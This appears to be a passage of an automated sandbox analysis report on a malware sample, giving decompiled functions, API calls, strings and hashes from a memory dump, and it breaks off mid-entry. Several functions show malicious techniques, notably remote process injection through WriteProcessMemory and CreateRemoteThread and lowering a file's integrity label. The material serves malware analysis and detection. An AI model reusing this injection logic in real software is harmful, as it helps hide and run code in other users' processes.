TlsGetValue.KERNEL32(?), ref: 0041BE1C
SetRectRgn.GDI32(?,?,?,?,?), ref: 0041BE42
SaveDC.GDI32(?), ref: 0041BE54
SendMessageW.USER32(?,00000014,?,00000000), ref: 0041BE65
RestoreDC.GDI32(?,00000000), ref: 0041BE78
GetUpdateRgn.USER32 ref: 0041BE97

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: e33eede72da129707398d265acd7b33279bf41692119ea42fd821f670bfc7853
Instruction ID: d0dac86f0ebcc0d90c5613884d8334d313e4975614d43eedfb24edc0afd595ae
Opcode Fuzzy Hash: e33eede72da129707398d265acd7b33279bf41692119ea42fd821f670bfc7853
Instruction Fuzzy Hash: 6E111D726007019FD320DB65DD88E97B7E8EB98701F14891EF68697660C774E885CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C670, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041C670(signed int __eax, void* __edi, void* __esi) {
				signed int _v4;
				intOrPtr _t7;
				intOrPtr _t8;
				char _t10;
				struct HINSTANCE__* _t13;
				signed int _t16;
				void* _t18;
				void* _t21;

				_t21 = __esi;
				_t18 = __edi;
				_t16 = __eax & 0x00000001;
				if(_t16 == 0) {
					_v4 = _t16;
					_t13 = GetModuleHandleW(L"kernel32.dll");
					if(_t13 == 0) {
						L4:
						if((_t13 & 0xffffff00 | _v4 != 0x00000000) != 0) {
							 *0x42e8f8 =  *0x42e8f8 | 0x00000001;
						}
					} else {
						_t13 = GetProcAddress(_t13, "IsWow64Process");
						if(_t13 == 0) {
							goto L4;
						} else {
							_t13 = _t13->i(0xffffffff,  &_v4);
							if(_t13 != 0) {
								goto L4;
							}
						}
					}
				}
				_push(_t21);
				_push(_t18);
				_t7 = E00415510(0x42e930, 0x42e93c);
				 *0x42e950 = _t7;
				if(_t7 != 0) {
					if(_t16 == 0) {
						_push(0x42eb70);
						E00416D20();
					}
					_t8 = E004104D0();
					 *0x42eb60 = _t8;
					if(_t8 < 2) {
						goto L7;
					} else {
						_t10 = E00412A50();
						 *0x42eb64 = _t10;
						if(_t10 != 0) {
							L14:
							if(_t16 != 0 || _t10 >= 2) {
								return 1;
							} else {
								goto L7;
							}
						} else {
							if( *0x42eb60 >= 4) {
								goto L7;
							} else {
								_t10 = 2;
								 *0x42eb64 = 2;
								goto L14;
							}
						}
					}
				} else {
					L7:
					return 0;
				}
			}

0x0041c670
0x0041c670
0x0041c674
0x0041c677
0x0041c67e
0x0041c682
0x0041c68a
0x0041c6a9
0x0041c6b3
0x0041c6b5
0x0041c6b5
0x0041c68c
0x0041c692
0x0041c69a
0x00000000
0x0041c69c
0x0041c6a3
0x0041c6a7
0x00000000
0x00000000
0x0041c6a7
0x0041c69a
0x0041c68a
0x0041c6bc
0x0041c6bd
0x0041c6c8
0x0041c6ce
0x0041c6d6
0x0041c6df
0x0041c6e1
0x0041c6e6
0x0041c6e6
0x0041c6eb
0x0041c6f0
0x0041c6f8
0x00000000
0x0041c6fa
0x0041c6fa
0x0041c6ff
0x0041c706
0x0041c718
0x0041c71a
0x0041c724
0x00000000
0x00000000
0x00000000
0x0041c708
0x0041c70f
0x00000000
0x0041c711
0x0041c711
0x0041c713
0x00000000
0x0041c713
0x0041c70f
0x0041c706
0x0041c6d8
0x0041c6d8
0x0041c6dc
0x0041c6dc

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,0041CB8C,?,00000000), ref: 0041C682
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0041C692

Strings

0B, xrefs: 0041C6C3
IsWow64Process, xrefs: 0041C68C
<B, xrefs: 0041C6BE
kernel32.dll, xrefs: 0041C679

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 0B$<B$IsWow64Process$kernel32.dll
API String ID: 1646373207-706167745
Opcode ID: dce168075af999828b9bd68a349c531712020c14392055b812072d4fcef76847
Instruction ID: 89c729ec999a93abaca3a359321705bfbf6efdf599fc20fce41dff25afd514de
Opcode Fuzzy Hash: dce168075af999828b9bd68a349c531712020c14392055b812072d4fcef76847
Instruction Fuzzy Hash: FC114CB0781302AA9F20AB636CC57E72F897A51354760147FE452A72A1DB7CC4C2C63D

Uniqueness

Uniqueness Score: -1.00%

Function 00427DB1, Relevance: 10.6, APIs: 7, Instructions: 63
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00427DB1(void* __eax, int _a8) {
				void* __ebx;
				long _t12;
				intOrPtr _t17;
				int _t24;
				struct HWND__* _t38;

				if(__eax + 0x42e94e == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
					return SetCapture();
				}
				_t24 = _a8;
				if(_t24 != 0) {
					_t12 = GetCurrentThreadId();
					_t34 = _t12;
					if(_t12 != GetWindowThreadProcessId(_t24, 0)) {
						return 0;
					} else {
						return E004272D0(_t24, 0x42eea0, _t34, 0, 0);
					}
				} else {
					WaitForSingleObject( *0x42eeb4, 0xffffffff);
					_t17 =  *0x42eeb0;
					_t38 =  *(_t17 + 0x108);
					 *(_t17 + 0x10c) = _t24;
					 *( *0x42eeb0 + 0x108) = _t24;
					 *((short*)( *0x42eeb0 + 0x110)) = 0;
					ReleaseMutex( *0x42eeb4);
					if(IsWindow(_t38) != 0) {
						SendMessageW(_t38, 0x215, _t24, _t24);
					}
					return _t38;
				}
			}

0x00427db8
0x00427e74
0x00427e74
0x00427dd7
0x00427ddd
0x00427e43
0x00427e4c
0x00427e56
0x00427e70
0x00427e58
0x00427e69
0x00427e69
0x00427ddf
0x00427de8
0x00427dea
0x00427def
0x00427df5
0x00427e01
0x00427e0f
0x00427e1d
0x00427e2c
0x00427e36
0x00427e36
0x00427e40
0x00427e40

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00427DCC
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00427DE8
ReleaseMutex.KERNEL32(?), ref: 00427E1D
IsWindow.USER32(?), ref: 00427E24
SendMessageW.USER32(?,00000215,?,?), ref: 00427E36
GetCurrentThreadId.KERNEL32 ref: 00427E43
GetWindowThreadProcessId.USER32(?,00000000), ref: 00427E4E

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleThreadWaitWindow$CurrentMessageMutexProcessReleaseSend
String ID:
API String ID: 2977258062-0
Opcode ID: 1846223971732b21802f00a85ffb3b3977dd226544ea496044cdb2bb321f4f63
Instruction ID: 03d7464fe5a9512be97bb829366a3c1bf00cd9bf9ac45e19c4dccc4d2979ea1e
Opcode Fuzzy Hash: 1846223971732b21802f00a85ffb3b3977dd226544ea496044cdb2bb321f4f63
Instruction Fuzzy Hash: B41198727042209BD3209B65BC84BD77799BB18310F9645BBF504E73B1D7B49C418BAC

Uniqueness

Uniqueness Score: -1.00%

Function 004182C0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004182C0(WCHAR* __ebx) {
				short _v520;
				char _v1040;
				void* __esi;
				long _t8;
				void* _t10;
				signed int _t11;
				WCHAR* _t16;
				WCHAR* _t17;
				void* _t20;
				WCHAR* _t21;
				void* _t23;

				_t16 = __ebx;
				_t23 =  &_v1040;
				if(GetTempPathW(0xf6,  &_v520) - 1 > 0xf5) {
					L12:
					return 0;
				} else {
					_t20 = 0;
					while(1) {
						_t8 = GetTickCount();
						if(_t8 !=  *0x42dd08) {
							 *0x42dd08 = _t8;
							E00412320(_t8);
						}
						_push(E00412360());
						_push(L"tmp");
						_t21 =  &_v1040;
						_t10 = E00411D10(_t9, 0x104, _t21, L"%s%08x");
						_t23 = _t23 + 0xc;
						if(_t10 == 0xffffffff) {
							goto L12;
						}
						_t17 = _t21;
						while(1) {
							_t11 =  *_t17 & 0x0000ffff;
							if(_t11 != 0x5c && _t11 != 0x2f) {
								break;
							}
							_t17 =  &(_t17[1]);
						}
						if(PathCombineW(_t16,  &_v520, _t17) == 0 || CreateDirectoryW(_t16, 0) == 0) {
							_t20 = _t20 + 1;
							if(_t20 < 0x64) {
								continue;
							} else {
								goto L12;
							}
						} else {
							return 1;
						}
						goto L14;
					}
					goto L12;
				}
				L14:
			}

0x004182c0
0x004182c0
0x004182e2
0x00418367
0x00418370
0x004182e8
0x004182ee
0x004182f0
0x004182f0
0x004182fc
0x004182fe
0x00418303
0x00418303
0x0041830d
0x0041830e
0x0041831d
0x00418321
0x00418326
0x0041832c
0x00000000
0x00000000
0x0041832e
0x00418330
0x00418330
0x00418336
0x00000000
0x00000000
0x0041833d
0x0041833d
0x00418354
0x0041835f
0x00418363
0x00000000
0x00000000
0x00000000
0x00000000
0x00418373
0x0041837c
0x0041837c
0x00000000
0x00418354
0x00000000
0x004182f0
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 004182D6
GetTickCount.KERNEL32 ref: 004182F0
PathCombineW.SHLWAPI(?,?,?), ref: 0041834C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00418359

Strings

tmp, xrefs: 0041830E
%s%08x, xrefs: 00418313

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: 0d91bdbe08c78bcf7485725fab8d1d66fe13e3f12aca4c8c04d7478e417d3d91
Instruction ID: 569dce6fc8ab3a55e9de7b369f4fb0d0539646796b710b177d90b0dcd6d9f96f
Opcode Fuzzy Hash: 0d91bdbe08c78bcf7485725fab8d1d66fe13e3f12aca4c8c04d7478e417d3d91
Instruction Fuzzy Hash: C511027224020856D6202B29EC497FB3748ABA1B10F54083FFE21E21A1DA3EA9C6925D

Uniqueness

Uniqueness Score: -1.00%

Function 00428190, Relevance: 10.6, APIs: 7, Instructions: 59
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428190(long __eax, intOrPtr _a4) {
				void* __esi;
				void* _t5;
				void* _t19;
				void* _t22;
				void* _t24;

				_t22 = OpenProcess(0x47a, 0, __eax);
				if(_t22 == 0) {
					L6:
					return 0;
				} else {
					_t5 = E0041CE60(_t22, _a4, 0);
					_t19 = _t5;
					if(_t19 == 0) {
						L5:
						CloseHandle(_t22);
						goto L6;
					} else {
						_t24 = CreateRemoteThread(_t22, 0, 0, _t5 -  *0x42e90c + E0041D930, 0, 0, 0);
						if(_t24 == 0) {
							VirtualFreeEx(_t22, _t19, 0, 0x8000);
							goto L5;
						} else {
							WaitForSingleObject(_t24, 0x2710);
							CloseHandle(_t24);
							CloseHandle(_t22);
							return 1;
						}
					}
				}
			}

0x004281a2
0x004281a6
0x0042821d
0x00428220
0x004281a8
0x004281b0
0x004281b5
0x004281b9
0x00428214
0x00428215
0x00000000
0x004281bb
0x004281d9
0x004281dd
0x0042820d
0x00000000
0x004281df
0x004281e5
0x004281ec
0x004281f6
0x00428201
0x00428201
0x004281dd
0x004281b9

APIs

OpenProcess.KERNEL32(0000047A,00000000,0000022C,?,00000000,004284A5,?,?,?,?,?,?,?,?,?,00000000), ref: 0042819C

Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,00000010), ref: 0041CE9B
Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CED3
Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CEF7
Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,?,00000010), ref: 0041CF25
Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,000004B0,?,00000004,00000000,?,00000010), ref: 0041CF38
Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000001,?,00000010), ref: 0041CF4E

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0084C23C,00000000,00000000,00000000), ref: 004281D3
WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,?,?,?,00000000,?), ref: 004281E5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004281EC
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?), ref: 004281F6
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,?,?,?,?,?,?,00000000,?), ref: 0042820D
CloseHandle.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00428215

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle$Process$CloseDuplicateMemoryWrite$CreateFreeObjectOpenRemoteSingleThreadVirtualWait
String ID:
API String ID: 3021577363-0
Opcode ID: 037dc62950ed38f5e49afb52f522b1bc3f6799230f214d50ca7eccebbc4f4a3a
Instruction ID: 19da691ac512ac1678b9f0c2a1aec5a7c81d3177f275ac7bfee0fa22b8d0c3f6
Opcode Fuzzy Hash: 037dc62950ed38f5e49afb52f522b1bc3f6799230f214d50ca7eccebbc4f4a3a
Instruction Fuzzy Hash: 2701D8762C26257BD2601765AD09FDB3B1CDB46B11F144026FB04FA1E18BB55400867C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C330, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56
synchronizationmemoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040C330() {
				char _v672;
				char _v800;
				long _t6;
				void* _t7;
				void* _t8;
				void* _t19;
				void* _t20;

				if( *0x42d490 == 0) {
					E0041D150( &_v800);
					E00416E10(0x42eb70,  &_v672,  *0x42e904, 0x42d490, 2);
				}
				_t19 = 0;
				_t20 = CreateMutexW(0x42e930, 0, 0x42d490);
				if(_t20 == 0) {
					L10:
					return _t19;
				}
				_t6 = WaitForSingleObject(_t20, 0xffffffff);
				if(_t6 != 0 && _t6 != 0x80) {
					L9:
					CloseHandle(_t20);
					goto L10;
				}
				 *0x42d420 = _t20;
				_t7 = E0040C250();
				if(_t7 != 0) {
					return _t7;
				} else {
					_t8 = HeapAlloc( *0x42e6d4, 8, 0x34);
					_t19 = _t8;
					if(_t19 == 0) {
						ReleaseMutex(_t20);
						goto L9;
					}
					 *((intOrPtr*)(_t19 + 0x14)) = 0x30;
					return _t8;
				}
			}

0x0040c340
0x0040c346
0x0040c369
0x0040c369
0x0040c373
0x0040c381
0x0040c385
0x0040c3df
0x00000000
0x0040c3df
0x0040c38a
0x0040c392
0x0040c3d8
0x0040c3d9
0x00000000
0x0040c3d9
0x0040c39b
0x0040c3a1
0x0040c3a8
0x0040c3e9
0x0040c3aa
0x0040c3b5
0x0040c3bb
0x0040c3bf
0x0040c3d2
0x00000000
0x0040c3d2
0x0040c3c1
0x0040c3d0
0x0040c3d0

APIs

CreateMutexW.KERNEL32(0042E930,00000000,0042D490,74B05520,00000000), ref: 0040C37B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040C38A
HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C3B5

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

ReleaseMutex.KERNEL32(00000000), ref: 0040C3D2
CloseHandle.KERNEL32(00000000), ref: 0040C3D9

Strings

pB, xrefs: 0040C364

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Mutex$AllocCloseCreateFromHandleHeapObjectReleaseSingleStringWait
String ID: pB
API String ID: 2916992386-3059159000
Opcode ID: fb77f018d931ddad48b7e89164d6c81ef707f2f0f30168538d14b3d06ff388a5
Instruction ID: b8c892cb5e05e7d7aa04fdeb8d67cdb158711a6a6227cf05751652df113614ff
Opcode Fuzzy Hash: fb77f018d931ddad48b7e89164d6c81ef707f2f0f30168538d14b3d06ff388a5
Instruction Fuzzy Hash: DF11E535700210A7C331A75AFD49B9F3765AB80714F90823BF904E62E0DB7CA945839D

Uniqueness

Uniqueness Score: -1.00%

Function 00427E81, Relevance: 10.5, APIs: 7, Instructions: 48
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427E81(void* __eax) {
				intOrPtr _t15;
				struct HWND__* _t29;

				if(__eax + 0x42e94e == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
					return ReleaseCapture();
				} else {
					if( *((intOrPtr*)( *0x42eeb0 + 0x10c)) != GetCurrentThreadId()) {
						SetLastError(5);
						return 0;
					} else {
						WaitForSingleObject( *0x42eeb4, 0xffffffff);
						_t15 =  *0x42eeb0;
						_t29 =  *(_t15 + 0x108);
						 *(_t15 + 0x10c) = 0;
						 *( *0x42eeb0 + 0x108) = 0;
						 *((short*)( *0x42eeb0 + 0x110)) = 0;
						ReleaseMutex( *0x42eeb4);
						if(IsWindow(_t29) != 0) {
							SendMessageW(_t29, 0x215, 0, 0);
						}
						return 1;
					}
				}
			}

0x00427e88
0x00427f33
0x00427ea6
0x00427eb8
0x00427f28
0x00427f31
0x00427eba
0x00427ec3
0x00427ec5
0x00427eca
0x00427ed0
0x00427edf
0x00427ef1
0x00427efe
0x00427f0d
0x00427f19
0x00427f19
0x00427f25
0x00427f25
0x00427eb8

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00427E9C
GetCurrentThreadId.KERNEL32 ref: 00427EA6
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00427EC3
ReleaseMutex.KERNEL32(?), ref: 00427EFE
IsWindow.USER32(?), ref: 00427F05
SendMessageW.USER32(?,00000215,00000000,00000000), ref: 00427F19
SetLastError.KERNEL32(00000005), ref: 00427F28

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CurrentErrorLastMessageMutexReleaseSendThreadWindow
String ID:
API String ID: 2394950798-0
Opcode ID: 0184ed2494fbe5e87a582de832e017ea7e2451937e1af9662c65da09e688fd82
Instruction ID: 85e858472a7bc5845b9a7890ceeed18e17f895e1a7946e147247625f2f21061e
Opcode Fuzzy Hash: 0184ed2494fbe5e87a582de832e017ea7e2451937e1af9662c65da09e688fd82
Instruction Fuzzy Hash: 53113931308220DBD7109B65FE48B9633A4BB08311F9645BAF504AB2F0D7B8A8428B88

Uniqueness

Uniqueness Score: -1.00%

Function 004155D0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004155D0() {
				intOrPtr _v12;
				char _v16;
				int _v20;
				int _v24;
				struct _SECURITY_DESCRIPTOR* _v28;
				struct _ACL* _v32;
				char* _t11;
				intOrPtr _t16;
				struct _ACL* _t17;

				_t17 = 0;
				E004129B0(L"SeSecurityPrivilege");
				_t11 =  &_v16;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v32 = 0;
					if(GetSecurityDescriptorSacl(_v28,  &_v20,  &_v32,  &_v24) != 0) {
						_t16 = _v12;
						__imp__SetNamedSecurityInfoW(_t16, 1, 0x10, 0, 0, 0, _v32);
						if(_t16 == 0) {
							_t17 = 1;
						}
					}
					LocalFree(_v28);
				}
				return _t17;
			}

0x004155d9
0x004155db
0x004155e1
0x004155ed
0x004155f5
0x0041560b
0x00415617
0x0041561d
0x0041562a
0x00415632
0x00415634
0x00415634
0x00415632
0x0041563b
0x0041563b
0x00415647

APIs

Part of subcall function 004129B0: GetCurrentThread.KERNEL32 ref: 004129BD
Part of subcall function 004129B0: OpenThreadToken.ADVAPI32(00000000), ref: 004129C4
Part of subcall function 004129B0: OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 004129D7

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 004155ED
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?,?,00000000), ref: 0041560F
SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 0041562A
LocalFree.KERNEL32(?,?,?,?,?,00000000), ref: 0041563B

Strings

S:(ML;CIOI;NRNWNX;;;LW), xrefs: 004155E8
SeSecurityPrivilege, xrefs: 004155D4

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: 5c4db446908ee34f3954bcaef7d74de7348f88bdd9b288bd9ab2835081f65749
Instruction ID: 6db4545cd2e073eb2715da7699a2d1421ba959c06f0a76aa084d70fb424212d3
Opcode Fuzzy Hash: 5c4db446908ee34f3954bcaef7d74de7348f88bdd9b288bd9ab2835081f65749
Instruction Fuzzy Hash: 25018FF1244301AFD310DF50CDC0EE777ACEB84744F00882EF98592191E678D8498779

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
networkCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00406CC0(void* __eax, intOrPtr* __esi) {
				intOrPtr _t5;
				void* _t7;
				intOrPtr _t8;
				short _t12;
				intOrPtr _t13;
				intOrPtr* _t14;

				_t14 = __esi;
				if(__eax != 0) {
					_t5 = E00415030(__eax, _t12);
				} else {
					_t5 = E00414F40(_t12);
				}
				 *_t14 = _t5;
				if(_t5 == 0xffffffff) {
					L10:
					 *_t14 = 0xffffffff;
					 *(_t14 + 4) = 0;
					return 0;
				} else {
					_t7 = CreateEventW(0, 0, 0, 0);
					 *(_t14 + 4) = _t7;
					if(_t7 == 0) {
						L8:
						_t13 =  *_t14;
						if(_t13 != 0xffffffff) {
							__imp__#22(_t13, 2);
							__imp__#3(_t13);
						}
						goto L10;
					} else {
						_t8 =  *_t14;
						__imp__WSAEventSelect(_t8, _t7, 8);
						if(_t8 != 0) {
							CloseHandle( *(_t14 + 4));
							goto L8;
						} else {
							return 1;
						}
					}
				}
			}

0x00406cc0
0x00406cc4
0x00406ccd
0x00406cc6
0x00406cc6
0x00406cc6
0x00406cd2
0x00406cd7
0x00406d23
0x00406d23
0x00406d29
0x00406d33
0x00406cd9
0x00406ce1
0x00406ce7
0x00406cec
0x00406d0c
0x00406d0c
0x00406d11
0x00406d16
0x00406d1d
0x00406d1d
0x00000000
0x00406cee
0x00406cf1
0x00406cf4
0x00406cfc
0x00406d06
0x00000000
0x00406cfe
0x00406d01
0x00406d01
0x00406cfc
0x00406cec

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00406EDE), ref: 00406CE1
WSAEventSelect.WS2_32(00000000,00000000,00000008), ref: 00406CF4

Part of subcall function 00414F40: GetTickCount.KERNEL32 ref: 00414F80
Part of subcall function 00414F40: socket.WS2_32(?,00000001,00000006), ref: 00414FBF
Part of subcall function 00414F40: bind.WS2_32(00000000,00000002,-0000001D), ref: 00414FE1
Part of subcall function 00414F40: listen.WS2_32(00000000,7FFFFFFF), ref: 00414FED
Part of subcall function 00414F40: closesocket.WS2_32(00000000), ref: 00414FF8

CloseHandle.KERNEL32(?), ref: 00406D06
shutdown.WS2_32(00000000,00000002), ref: 00406D16
closesocket.WS2_32(00000000), ref: 00406D1D

Strings

p0u, xrefs: 00406D1D

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Eventclosesocket$CloseCountCreateHandleSelectTickbindlistenshutdownsocket
String ID: p0u
API String ID: 3099518682-1742372003
Opcode ID: 0c00c60eebf260ec0e59da2aae27809ee80ad0c6a00fe6871682c1fd11f28fbb
Instruction ID: 65f8ca898ce9404f761a7ac0dd1ec09e42ce21a56408490c94b3bbace500e2e4
Opcode Fuzzy Hash: 0c00c60eebf260ec0e59da2aae27809ee80ad0c6a00fe6871682c1fd11f28fbb
Instruction Fuzzy Hash: 9701A9712007016BE7606F78FD09B5A37A4AF85760F11472EF5A3F72E0DB3894528718

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAB0, Relevance: 10.5, APIs: 7, Instructions: 43
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EAB0(void* __ecx, void* __edx, void* __eflags) {
				long _t4;
				long _t10;
				long _t12;
				void* _t17;

				_t16 = __edx;
				_t17 = E0041CDD0(__eflags, 0x19367401, 1);
				if(_t17 != 0) {
					_t4 = WaitForSingleObject( *0x42edbc, 0);
					__eflags = _t4;
					if(_t4 != 0) {
						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
						_t10 = WaitForSingleObject( *0x42edbc, 0x1388);
						__eflags = _t10 - 0x102;
						if(_t10 == 0x102) {
							do {
								E00428230(_t16);
								_t16 =  *0x42edbc;
								_t12 = WaitForSingleObject( *0x42edbc, 0x1388);
								__eflags = _t12 - 0x102;
							} while (_t12 == 0x102);
						}
					}
					ReleaseMutex(_t17);
					CloseHandle(_t17);
					__eflags = 0;
					return 0;
				} else {
					_t1 = _t17 + 1; // 0x1
					return _t1;
				}
			}

0x0040eab0
0x0040eabd
0x0040eac1
0x0040ead9
0x0040eadb
0x0040eadd
0x0040eae8
0x0040eafa
0x0040eafc
0x0040eb01
0x0040eb03
0x0040eb03
0x0040eb08
0x0040eb14
0x0040eb16
0x0040eb16
0x0040eb03
0x0040eb01
0x0040eb1e
0x0040eb25
0x0040eb2c
0x0040eb2f
0x0040eac3
0x0040eac3
0x0040eac7
0x0040eac7

APIs

Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39

WaitForSingleObject.KERNEL32(?,00000000,?,19367401,00000001), ref: 0040EAD9
GetCurrentThread.KERNEL32 ref: 0040EAE1
SetThreadPriority.KERNEL32(00000000,?,19367401,00000001), ref: 0040EAE8
WaitForSingleObject.KERNEL32(?,00001388,?,19367401,00000001), ref: 0040EAFA
WaitForSingleObject.KERNEL32(?,00001388,?,19367401,00000001), ref: 0040EB14
ReleaseMutex.KERNEL32(00000000,?,19367401,00000001), ref: 0040EB1E
CloseHandle.KERNEL32(00000000,?,19367401,00000001), ref: 0040EB25

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

